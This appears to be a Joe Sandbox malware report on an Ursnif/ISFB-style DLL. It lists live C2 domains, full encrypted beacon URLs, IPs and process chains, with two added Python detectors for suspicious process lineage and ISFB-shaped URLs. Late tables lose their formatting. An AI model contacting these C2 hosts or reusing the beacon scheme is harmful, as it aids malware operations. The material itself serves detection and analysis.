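Event ID 1 (Image, ParentImage, CommandLine); the events, PIDs and the Temp
subdirectory below are constructed for the demonstration.
"""
import ntpath
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation event, reduced to the fields the checks need."""
    pid: int
    ppid: int
    image: str
    parent_image: str
    command_line: str = ""


def _base(path: str) -> str:
    """Lower-cased file name of a Windows path (ntpath handles both slash kinds)."""
    return ntpath.basename(path).lower()


# Parent -> children. Every pair below appears in the report's behaviour graph.
# loaddll32.exe (the sandbox harness) and cmd.exe -> rundll32.exe are left out:
# the first never occurs on a real host, the second is far too common to alert on.
SUSPICIOUS_PAIRS = {
    "mshta.exe": {"powershell.exe"},
    "powershell.exe": {"csc.exe"},
    "csc.exe": {"cvtres.exe"},
    "regsvr32.exe": {"control.exe"},
    "rundll32.exe": {"control.exe"},
    "control.exe": {"rundll32.exe"},
}


def flag_events(events):
    """Return (pid, reason) for every event that matches a check; a pid may appear twice."""
    findings = []
    for ev in events:
        parent, child = _base(ev.parent_image), _base(ev.image)
        if child in SUSPICIOUS_PAIRS.get(parent, ()):
            findings.append((ev.pid, f"{parent} spawned {child}"))
        # PowerShell Add-Type hands csc.exe a .cmdline file under the user profile;
        # the report's dropped nigogz4l.cmdline and the compiled DLLs live under AppData.
        if child == "csc.exe" and "\\appdata\\" in ev.command_line.lower():
            findings.append((ev.pid, "csc.exe compiling from a source under AppData"))
    return findings


def lineage(events, pid):
    """Image names from the oldest known ancestor down to pid (cycle-safe)."""
    by_pid = {ev.pid: ev for ev in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(_base(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return chain[::-1]


SYS32 = r"C:\Windows\System32"
WOW64 = r"C:\Windows\SysWOW64"
NETFX = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319"
# Constructed events mirroring the report's two chains plus a benign sibling.
SAMPLE_EVENTS = [
    ProcEvent(1000, 800, r"C:\Windows\explorer.exe", SYS32 + r"\userinit.exe"),
    ProcEvent(6300, 1000, SYS32 + r"\mshta.exe", r"C:\Windows\explorer.exe"),
    ProcEvent(6310, 6300, SYS32 + r"\WindowsPowerShell\v1.0\powershell.exe", SYS32 + r"\mshta.exe"),
    ProcEvent(6320, 6310, NETFX + r"\csc.exe", SYS32 + r"\WindowsPowerShell\v1.0\powershell.exe",
              r'csc.exe /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.cmdline"'),
    ProcEvent(6330, 6320, NETFX + r"\cvtres.exe", NETFX + r"\csc.exe"),
    ProcEvent(6390, 1000, WOW64 + r"\cmd.exe", r"C:\Windows\explorer.exe"),
    ProcEvent(6400, 6390, WOW64 + r"\rundll32.exe", WOW64 + r"\cmd.exe"),
    ProcEvent(6500, 6400, WOW64 + r"\control.exe", WOW64 + r"\rundll32.exe"),
    ProcEvent(6510, 6500, WOW64 + r"\rundll32.exe", WOW64 + r"\control.exe"),
    ProcEvent(7000, 1000, SYS32 + r"\notepad.exe", r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for pid, reason in flag_events(SAMPLE_EVENTS):
        print(f"{pid:>5}  {' > '.join(lineage(SAMPLE_EVENTS, pid))}  [{reason}]")
```

Running it prints five flagged PIDs with their full lineage; csc.exe (6320) is reported twice, once for its parent and once for the AppData source path, which is the desired behaviour when the two checks feed separate rules. The pair table is the tuning point: control.exe spawning rundll32.exe is the quietest of the six pairs on a normal workstation, mshta.exe spawning powershell.exe the loudest in environments that still ship HTA-based tooling.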

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner
6.dll | 100% | Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source | Detection | Scanner | Label
4.2.rundll32.exe.f10000.1.unpack | 100% | Avira | HEUR/AGEN.1108168

Domains

Source | Detection | Scanner
windows.update3.com | 0% | Virustotal

URLs

Source | Detection | Scanner | Label
https://berukoneru.website/tire/5Dw6h1nh0yZR8l/CEdpvqzTXmbvA8zN38_2F/HfVXZtPlGclvWlY_/2F2pmmVAx7s9on | 0% | Avira URL Cloud | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
https://berukoneru.website/tyi | 0% | Avira URL Cloud | safe
https://berukoneru.website/tire/cFJsSWAGWE/z2qui_2Bz1BNPPVC8/40cjfJwuY_2F/qeMRrcIZBVG/Ne0YpnkwEJfIh3/f5okxbrq_2FXxzqJmpSlY/lBFuBWEAi70a61Vy/5QzGUBrPY97n5jQ/Uty84umyFnIA829ewc/61TtijfTY/zF0ZOoxI3N5pWHzggULR/QMXY_2F7FMDggc4thO7/G_2BQV4WNp08p5XmI0/TT.eta | 0% | Avira URL Cloud | safe
http://constitution.org/usdeclar.txtC: | 0% | URL Reputation | safe
https://windows.update3.com/ | 0% | Avira URL Cloud | safe
http://https://file://USER.ID%lu.exe/upd | 0% | Avira URL Cloud | safe
https://berukoneru.website:443/tire/iL5Q0EgKDzXlIJvSVY9Fa72/roFEnyYEEO/BTl6hhjqhLPztNm87/ClBTSTJ24YQ | 0% | Avira URL Cloud | safe
https://assets.onestore.ms/cdnfiles/onestorerolling-1605-16000/shell/common/respond-proxy.html | 0% | Avira URL Cloud | safe
https://berukoneru.website/tire/BkVC2TYPKwX7I/d18vbD7j/LfTctW1YFOCxVg72R7OOyCe/FNM87YiO3R/kqhypryuHY | 0% | Avira URL Cloud | safe
https://berukoneru.website/tire/xfoS5YiSnq/LOnpfmnBMaAwxRNJT/gKlVrjFyFJq8/T2InmpA9wuO/M0panYR_2BpfjL/QVPhPbWeSwRVFSzMJ6Vcg/Y9VyT4fbhoZ82vwq/2GIivBsbax9rQUh/n7Uc5KQo0J8ysVLUlr/XSTAmgKJY/zcSJprSz5_2F2B_2Bsbt/2juDsOXqzjP5XLZ_2FP/WpBTOnAHWcoi3w7ov9P0p8/2Wzq8vdJF/5Vrog3ES/Q.eta | 0% | Avira URL Cloud | safe
https://windows.update3.com/tire/h5hri2qU3j_2/FtKGoeU1cGb/_2B9_2FVlXXJXe/pIon3PPVjwV3l856n6O1d/JfgtT | 0% | Avira URL Cloud | safe
https://berukoneru.website/ | 0% | Avira URL Cloud | safe
http://constitution.org/usdeclar.txt | 0% | URL Reputation | safe
https://berukoneru.website/O | 0% | Avira URL Cloud | safe
https://berukoneru.website/BS | 0% | Avira URL Cloud | safe
https://berukoneru.website/tire/5Dw6h1nh0yZR8l/CEdpvqzTXmbvA8zN38_2F/HfVXZtPlGclvWlY_/2F2pmmVAx7s9onw/Df8mv9bGmzrCq_2BDh/Avhzr_2BW/zhUOFRSj_2Brp9dFi25e/XIimtsTVgbS8Ddk4Jlg/q7ifDAWTLXmxh8fPSAYnUc/3K8xDlQvgKVYD/9E1TEXJC/aPKjFJSRgVkfUwKBYWKDgLh/VONwiC9wK5/3CPG7RAhZST/_2FDfWf.eta | 0% | Avira URL Cloud | safe
https://berukoneru.website/tire/9IgUYNG9/P9N8jGg62VAhbwmUeolHFCg/K1HN9iUPdi/an2HdiNP_2FRIROSF/l9uR7XFSquKc/cTL90RaThvy/4LigE_2BC67Pa2/OL_2Fq6LzSFfAjBrcF1my/5AUpi_2BYfx15AAS/Ho8688ZDo7zPK6r/e_2F4ZPz87sJSle6kT/I1gJ4hikp/cCibgdVeBM9n2ccXEO18/D4MJBqmD.eta | 0% | Avira URL Cloud | safe
https://berukoneru.website/j | 0% | Avira URL Cloud | safe
https://berukoneru.website:443/tire/gAFUHu83b7fr5ftbr5O9tX/NNJYheBEZ_2Bt/wXhf6hyZ/iBEWHVb19RFKuDukD6 | 0% | Avira URL Cloud | safe
https://berukoneru.website/tire/4rLoqSurzyu0/faIn56YEFho/0rtfGJwOQq2F5c/BJoAXiIiU_2F9ZRU2hBse/gAViRvyFsSwGVefa/kRvG3X29VJojGH9/HHkJOTdVe7Nqn26zmq/y4GSGdPZu/kOhHaVJwE10tGTyVEPor/Cm7rt8Rg13eBm6Sc7Sm/5BVZ_2BPytM06u32e6Y8Q1/6dRgyXIz2yrBpW/dgW2i.eta | 0% | Avira URL Cloud | safe
https://nodejs.org0 | 0% | Avira URL Cloud | safe
https://berukoneru.website/tire/iH0556GjtiGQk4lyd6/e4eJ66Hyx/L2n2id7yGxzkaZSAZenq/25xy0D1xFkintWrbCA | 0% | Avira URL Cloud | safe
https://berukoneru.website/tire/xfoS5YiSnq/LOnpfmnBMaAwxRNJT/gKlVrjFyFJq8/T2InmpA9wuO/M0panYR_2BpfjL | 0% | Avira URL Cloud | safe
https://berukoneru.website/tire/iL5Q0EgKDzXlIJvSVY9Fa72/roFEnyYEEO/BTl6hhjqhLPztNm87/ClBTSTJ24YQi/659nN8frXqL/KI_2BmGQcF3l8a/UPJEdWRElF2Ck7h3GrI7f/Jn4UaIHKOCKly3pR/5WtUgfhtCob3WA8/8RFl0SkPd8NK0tapfV/Bv03ARxcw/T6wxTs3S_2BFMRgrZw2Q/_2BV_2F7vXjmj/i.eta | 0% | Avira URL Cloud | safe
https://windows.update3.com/tire/clW2f_2FhATNrnqvBey5XJ/HMTv6hdufnhb6/_2BVSemT/sKeyn9puL2fpAeyTFFwZv | 0% | Avira URL Cloud | safe
https://berukoneru.website/tire/iL5Q0EgKDzXlIJvSVY9Fa72/roFEnyYEEO/BTl6hhjqhLPztNm87/ClBTSTJ24YQi/65 | 0% | Avira URL Cloud | safe
https://berukoneru.website/jP | 0% | Avira URL Cloud | safe
https://berukoneru.website/tire/BkVC2TYPKwX7I/d18vbD7j/LfTctW1YFOCxVg72R7OOyCe/FNM87YiO3R/kqhypryuHYA4xvaox/Zos6wfhvU6Vx/dZ_2FhTkVUm/dQ1eWiBdVQx_2F/3MQ4AfN6CRhAz7ojdkAuB/vyHN6D_2BnDaccRD/rxLm6HRGflkJaqH/HtsgyaJ8NMuefJHJTr/vf407nMOm/3YNEpWUoxMPlA61ciEA5/ZB4w8oLbC0y/cC.eta | 0% | Avira URL Cloud | safe
https://berukoneru.website/LAp | 0% | Avira URL Cloud | safe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | 18.219.227.107 | true | false | - | high
berukoneru.website | 79.110.52.144 | true | true | - | unknown
windows.update3.com | unknown | unknown | true | - | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
https://berukoneru.website/tire/cFJsSWAGWE/z2qui_2Bz1BNPPVC8/40cjfJwuY_2F/qeMRrcIZBVG/Ne0YpnkwEJfIh3/f5okxbrq_2FXxzqJmpSlY/lBFuBWEAi70a61Vy/5QzGUBrPY97n5jQ/Uty84umyFnIA829ewc/61TtijfTY/zF0ZOoxI3N5pWHzggULR/QMXY_2F7FMDggc4thO7/G_2BQV4WNp08p5XmI0/TT.eta | true | Avira URL Cloud: safe | unknown
https://berukoneru.website/tire/xfoS5YiSnq/LOnpfmnBMaAwxRNJT/gKlVrjFyFJq8/T2InmpA9wuO/M0panYR_2BpfjL/QVPhPbWeSwRVFSzMJ6Vcg/Y9VyT4fbhoZ82vwq/2GIivBsbax9rQUh/n7Uc5KQo0J8ysVLUlr/XSTAmgKJY/zcSJprSz5_2F2B_2Bsbt/2juDsOXqzjP5XLZ_2FP/WpBTOnAHWcoi3w7ov9P0p8/2Wzq8vdJF/5Vrog3ES/Q.eta | true | Avira URL Cloud: safe | unknown
https://berukoneru.website/tire/5Dw6h1nh0yZR8l/CEdpvqzTXmbvA8zN38_2F/HfVXZtPlGclvWlY_/2F2pmmVAx7s9onw/Df8mv9bGmzrCq_2BDh/Avhzr_2BW/zhUOFRSj_2Brp9dFi25e/XIimtsTVgbS8Ddk4Jlg/q7ifDAWTLXmxh8fPSAYnUc/3K8xDlQvgKVYD/9E1TEXJC/aPKjFJSRgVkfUwKBYWKDgLh/VONwiC9wK5/3CPG7RAhZST/_2FDfWf.eta | true | Avira URL Cloud: safe | unknown
https://berukoneru.website/tire/9IgUYNG9/P9N8jGg62VAhbwmUeolHFCg/K1HN9iUPdi/an2HdiNP_2FRIROSF/l9uR7XFSquKc/cTL90RaThvy/4LigE_2BC67Pa2/OL_2Fq6LzSFfAjBrcF1my/5AUpi_2BYfx15AAS/Ho8688ZDo7zPK6r/e_2F4ZPz87sJSle6kT/I1gJ4hikp/cCibgdVeBM9n2ccXEO18/D4MJBqmD.eta | true | Avira URL Cloud: safe | unknown
https://berukoneru.website/tire/4rLoqSurzyu0/faIn56YEFho/0rtfGJwOQq2F5c/BJoAXiIiU_2F9ZRU2hBse/gAViRvyFsSwGVefa/kRvG3X29VJojGH9/HHkJOTdVe7Nqn26zmq/y4GSGdPZu/kOhHaVJwE10tGTyVEPor/Cm7rt8Rg13eBm6Sc7Sm/5BVZ_2BPytM06u32e6Y8Q1/6dRgyXIz2yrBpW/dgW2i.eta | true | Avira URL Cloud: safe | unknown
https://berukoneru.website/tire/iL5Q0EgKDzXlIJvSVY9Fa72/roFEnyYEEO/BTl6hhjqhLPztNm87/ClBTSTJ24YQi/659nN8frXqL/KI_2BmGQcF3l8a/UPJEdWRElF2Ck7h3GrI7f/Jn4UaIHKOCKly3pR/5WtUgfhtCob3WA8/8RFl0SkPd8NK0tapfV/Bv03ARxcw/T6wxTs3S_2BFMRgrZw2Q/_2BV_2F7vXjmj/i.eta | true | Avira URL Cloud: safe | unknown
https://berukoneru.website/tire/BkVC2TYPKwX7I/d18vbD7j/LfTctW1YFOCxVg72R7OOyCe/FNM87YiO3R/kqhypryuHYA4xvaox/Zos6wfhvU6Vx/dZ_2FhTkVUm/dQ1eWiBdVQx_2F/3MQ4AfN6CRhAz7ojdkAuB/vyHN6D_2BnDaccRD/rxLm6HRGflkJaqH/HtsgyaJ8NMuefJHJTr/vf407nMOm/3YNEpWUoxMPlA61ciEA5/ZB4w8oLbC0y/cC.eta | true | Avira URL Cloud: safe | unknown
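
Every contacted URL above has the same shape: a fixed first directory (tire), a long run of slash-separated alphanumeric chunks containing the tokens _2F and _2B, and a short extension (.eta). URL reputation services rate each one "safe" because the path is unique per request. The following is an added example written for this page, not code from the Joe Sandbox report or from the malware: it normalises such a path and decides structurally whether it looks like an ISFB/Ursnif C2 request. It relies on the documented ISFB URI scheme as an assumption: the path body is base64 of an encrypted client report, broken up by '/' at random positions, with the base64 characters '+', '/' and '=' replaced by _2B, _2F and _3D. The report shows the first two tokens; _3D is assumed from the same scheme. The thresholds (three or more segments, at least 32 decoded bytes) and the URL list at the bottom are constructed for the example, the first URL being copied from the Contacted URLs table and the other two from the report's memory strings.

```python
"""Normalise the request paths this sample sent to berukoneru.website and
windows.update3.com and decide whether they have the ISFB/Ursnif shape.

Added example, not part of the Joe Sandbox report. It assumes the documented
ISFB URI scheme: the path body is base64 of an encrypted blob with '/' inserted
at random positions and the base64 characters '+', '/' and '=' replaced by
'_2B', '_2F' and '_3D'. The report's URLs show the first two tokens; '_3D' is
assumed from the same scheme. Thresholds and the URL list below are constructed.
"""
import base64
import binascii
import math
import re
from collections import Counter
from urllib.parse import urlsplit

SUBSTITUTIONS = {"_2B": "+", "_2F": "/", "_3D": "="}
# /<fixed dir>/<slash-broken base64>.<ext>; this sample uses dir "tire" and ext "eta".
PATH_RE = re.compile(r"^/(?P<dir>[^/]+)/(?P<body>[^.]+)\.(?P<ext>[A-Za-z0-9]{1,5})$")
MIN_SEGMENTS = 3         # the sample's paths carry 6 to 13 slash-separated chunks
MIN_DECODED_BYTES = 32   # assumed floor: an encrypted client report is never this short


def normalise_path(path):
    """(ext, undecorated base64, segment count) or None when the shape does not fit."""
    m = PATH_RE.match(path)
    if m is None:
        return None
    segments = m.group("body").split("/")
    # Join first, then substitute: a token may straddle an inserted slash
    # (the report has ...GclvWlY_/2F2pmm...), so per-segment replacement would miss it.
    b64 = "".join(segments)
    for token, char in SUBSTITUTIONS.items():
        b64 = b64.replace(token, char)
    return m.group("ext").lower(), b64, len(segments)


def decode_body(b64):
    """Strict base64 decode after restoring padding; None when it is not base64."""
    b64 += "=" * (-len(b64) % 4)
    try:
        return base64.b64decode(b64, validate=True)
    except (binascii.Error, ValueError):
        return None


def shannon_entropy(data):
    """Bits per byte; encrypted payloads sit near 8, text well below 5."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def classify_url(url):
    """Structural verdict plus the evidence an analyst wants next to it."""
    parts = urlsplit(url)
    verdict = {"url": url, "host": parts.hostname, "isfb_like": False, "reason": "",
               "segments": 0, "decoded_len": 0, "entropy": 0.0}
    norm = normalise_path(parts.path)
    if norm is None:
        verdict["reason"] = "path is not /dir/<body>.<ext>"
        return verdict
    ext, b64, segments = norm
    verdict["segments"] = segments
    if segments < MIN_SEGMENTS:
        verdict["reason"] = "too few slash-separated segments"
        return verdict
    raw = decode_body(b64)
    if raw is None:
        verdict["reason"] = "body is not base64 after undoing _2B/_2F/_3D"
        return verdict
    verdict["decoded_len"], verdict["entropy"] = len(raw), round(shannon_entropy(raw), 2)
    if len(raw) < MIN_DECODED_BYTES:
        verdict["reason"] = "decoded body too short"
        return verdict
    verdict["isfb_like"] = True
    verdict["reason"] = f"ISFB-shaped path: {segments} segments, {len(raw)} encrypted bytes, .{ext}"
    return verdict


# First URL from the report's Contacted URLs table; the other two are benign
# strings from the report's memory dumps and serve as negatives.
SAMPLE_URLS = [
    "https://berukoneru.website/tire/cFJsSWAGWE/z2qui_2Bz1BNPPVC8/40cjfJwuY_2F/qeMRrcIZBVG/"
    "Ne0YpnkwEJfIh3/f5okxbrq_2FXxzqJmpSlY/lBFuBWEAi70a61Vy/5QzGUBrPY97n5jQ/Uty84umyFnIA829ewc/"
    "61TtijfTY/zF0ZOoxI3N5pWHzggULR/QMXY_2F7FMDggc4thO7/G_2BQV4WNp08p5XmI0/TT.eta",
    "https://aka.ms/MicrosoftEdgeDownload",
    "http://pesterbdd.com/images/Pester.png",
]

if __name__ == "__main__":
    for u in SAMPLE_URLS:
        v = classify_url(u)
        print(f"{v['isfb_like']!s:5} {v['host']:28} {v['reason']}")
```

The decision is deliberately structural rather than entropy-based: 144 random bytes cannot reach 8 bits of entropy, so a threshold there would be brittle, while "decodes as strict base64 once the ISFB substitutions are undone, after being split into many slash-separated chunks" is something ordinary web paths almost never satisfy. The entropy value is still returned so a reviewer can tell an encrypted report from a plaintext string that happens to be base64. Truncated memory strings such as /tyi or /O fail the shape test and are correctly not flagged; the host column is the place to add the lookalike check for windows.update3.com, which is outside this example.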

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
https://aka.ms/MicrosoftEdgeDownload" | loaddll32.exe, 00000000.00000003.317624845.0000000001398000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.316267329.00000000033D1000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.316701420.00000000008F1000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.316654509.0000000000FFE000.00000004.00000001.sdmp | false | - | high
https://berukoneru.website/tire/5Dw6h1nh0yZR8l/CEdpvqzTXmbvA8zN38_2F/HfVXZtPlGclvWlY_/2F2pmmVAx7s9on | regsvr32.exe, 00000002.00000003.362160768.00000000033C0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000018.00000003.396802391.000001497A5C1000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://berukoneru.website/tyi | rundll32.exe, 00000003.00000003.362882057.00000000008D7000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000018.00000003.396802391.000001497A5C1000.00000004.00000001.sdmp | false | - | high
http://constitution.org/usdeclar.txtC: | loaddll32.exe, 00000000.00000003.434428828.0000000004A88000.00000004.00000040.sdmp, regsvr32.exe, 00000002.00000003.418338276.0000000006518000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.418329153.0000000005C78000.00000004.00000040.sdmp, rundll32.exe, 00000004.00000003.418350281.0000000006148000.00000004.00000040.sdmp | false | URL Reputation: safe | unknown
https://windows.update3.com/ | regsvr32.exe, 00000002.00000003.363867556.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372687409.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.362364384.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.361019833.0000000003383000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.361512151.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.362934990.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.362827191.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.364485968.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.372692121.0000000000F9E000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://https://file://USER.ID%lu.exe/upd | loaddll32.exe, 00000000.00000003.434428828.0000000004A88000.00000004.00000040.sdmp, regsvr32.exe, 00000002.00000003.418338276.0000000006518000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.418329153.0000000005C78000.00000004.00000040.sdmp, rundll32.exe, 00000004.00000003.418350281.0000000006148000.00000004.00000040.sdmp | false | Avira URL Cloud: safe | low
https://berukoneru.website:443/tire/iL5Q0EgKDzXlIJvSVY9Fa72/roFEnyYEEO/BTl6hhjqhLPztNm87/ClBTSTJ24YQ | regsvr32.exe, 00000002.00000003.522837252.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.363867556.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372687409.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.419406202.000000000336B000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js | loaddll32.exe, 00000000.00000003.317582164.000000000139F000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.317644552.00000000013B1000.00000004.00000001.sdmp | false | - | high
https://assets.onestore.ms/cdnfiles/onestorerolling-1605-16000/shell/common/respond-proxy.html | rundll32.exe, 00000004.00000003.338607112.0000000000FF3000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000018.00000003.396802391.000001497A5C1000.00000004.00000001.sdmp | false | - | high
https://berukoneru.website/tire/BkVC2TYPKwX7I/d18vbD7j/LfTctW1YFOCxVg72R7OOyCe/FNM87YiO3R/kqhypryuHY | rundll32.exe, 00000004.00000003.365155224.0000000000FF2000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
                        https://windows.update3.com/tire/h5hri2qU3j_2/FtKGoeU1cGb/_2B9_2FVlXXJXe/pIon3PPVjwV3l856n6O1d/JfgtTrundll32.exe, 00000004.00000003.361512151.0000000000F9E000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://berukoneru.website/rundll32.exe, 00000003.00000003.364039010.00000000008D7000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.372813489.00000000008D7000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.523369955.00000000008D7000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000002.914075643.0000000000F3A000.00000004.00000020.sdmp, rundll32.exe, 00000004.00000003.364485968.0000000000F9E000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://constitution.org/usdeclar.txtloaddll32.exe, 00000000.00000003.434428828.0000000004A88000.00000004.00000040.sdmp, regsvr32.exe, 00000002.00000003.418338276.0000000006518000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.418329153.0000000005C78000.00000004.00000040.sdmp, rundll32.exe, 00000004.00000003.418350281.0000000006148000.00000004.00000040.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://berukoneru.website/Orundll32.exe, 00000004.00000003.362934990.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.362827191.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.522837424.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.372692121.0000000000F9E000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://berukoneru.website/BSregsvr32.exe, 00000002.00000003.372687409.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372837778.00000000033C0000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://berukoneru.website/jregsvr32.exe, 00000002.00000003.362364384.000000000336B000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://berukoneru.website:443/tire/gAFUHu83b7fr5ftbr5O9tX/NNJYheBEZ_2Bt/wXhf6hyZ/iBEWHVb19RFKuDukD6rundll32.exe, 00000004.00000003.372839349.0000000000FF2000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.372692121.0000000000F9E000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://nodejs.org06.dllfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://berukoneru.website/tire/iH0556GjtiGQk4lyd6/e4eJ66Hyx/L2n2id7yGxzkaZSAZenq/25xy0D1xFkintWrbCAloaddll32.exe, 00000000.00000003.372896811.0000000001341000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://berukoneru.website/tire/xfoS5YiSnq/LOnpfmnBMaAwxRNJT/gKlVrjFyFJq8/T2InmpA9wuO/M0panYR_2BpfjLregsvr32.exe, 00000002.00000003.372829342.000000000335B000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://windows.update3.com/tire/clW2f_2FhATNrnqvBey5XJ/HMTv6hdufnhb6/_2BVSemT/sKeyn9puL2fpAeyTFFwZvregsvr32.exe, 00000002.00000003.361178760.000000000335B000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://berukoneru.website/tire/iL5Q0EgKDzXlIJvSVY9Fa72/roFEnyYEEO/BTl6hhjqhLPztNm87/ClBTSTJ24YQi/65regsvr32.exe, 00000002.00000003.362615512.00000000033C1000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372837778.00000000033C0000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.419406202.000000000336B000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://berukoneru.website/jPregsvr32.exe, 00000002.00000003.522837252.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.363514151.00000000033C1000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372687409.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372837778.00000000033C0000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.419406202.000000000336B000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://berukoneru.website/LAprundll32.exe, 00000004.00000002.914075643.0000000000F3A000.00000004.00000020.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown

                        Contacted IPs

                        Public

IP | Domain | Country | ASN | ASN Name | Malicious
79.110.52.144 | berukoneru.website | Romania | 60233 | V4ESCROW-ASRO | true
18.219.227.107 | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | United States | 16509 | AMAZON-02US | false
3.12.124.139 | unknown | United States | 16509 | AMAZON-02US | true

                        Private

                        IP
                        192.168.2.1

                        General Information

                        Joe Sandbox Version:34.0.0 Boulder Opal
                        Analysis ID:539457
                        Start date:14.12.2021
                        Start time:10:32:11
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 14m 6s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Sample file name:6.png (renamed file extension from png to dll)
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:50
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal100.troj.evad.winDLL@59/52@16/4
                        EGA Information:Failed
                        HDC Information:
                        • Successful, ratio: 90.2% (good quality ratio 86.1%)
                        • Quality average: 78.9%
                        • Quality standard deviation: 28.8%
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 57
                        • Number of non-executed functions: 20
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI
                        • Override analysis time to 240s for rundll32
                        Warnings:
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                        • Excluded IPs from analysis (whitelisted): 104.215.148.63, 40.76.4.15, 40.112.72.205, 40.113.200.201, 13.77.161.179, 2.20.205.172
                        • Excluded domains from analysis (whitelisted): assets.msn.com, client.wns.windows.com, www.microsoft.com-c-3.edgekey.net, fs.microsoft.com, store-images.s-microsoft.com, e13678.dscb.akamaiedge.net, img-prod-cms-rt-microsoft-com.akamaized.net, microsoft.com, arc.msn.com, www.microsoft.com, www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
• Not all processes were analyzed; the report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
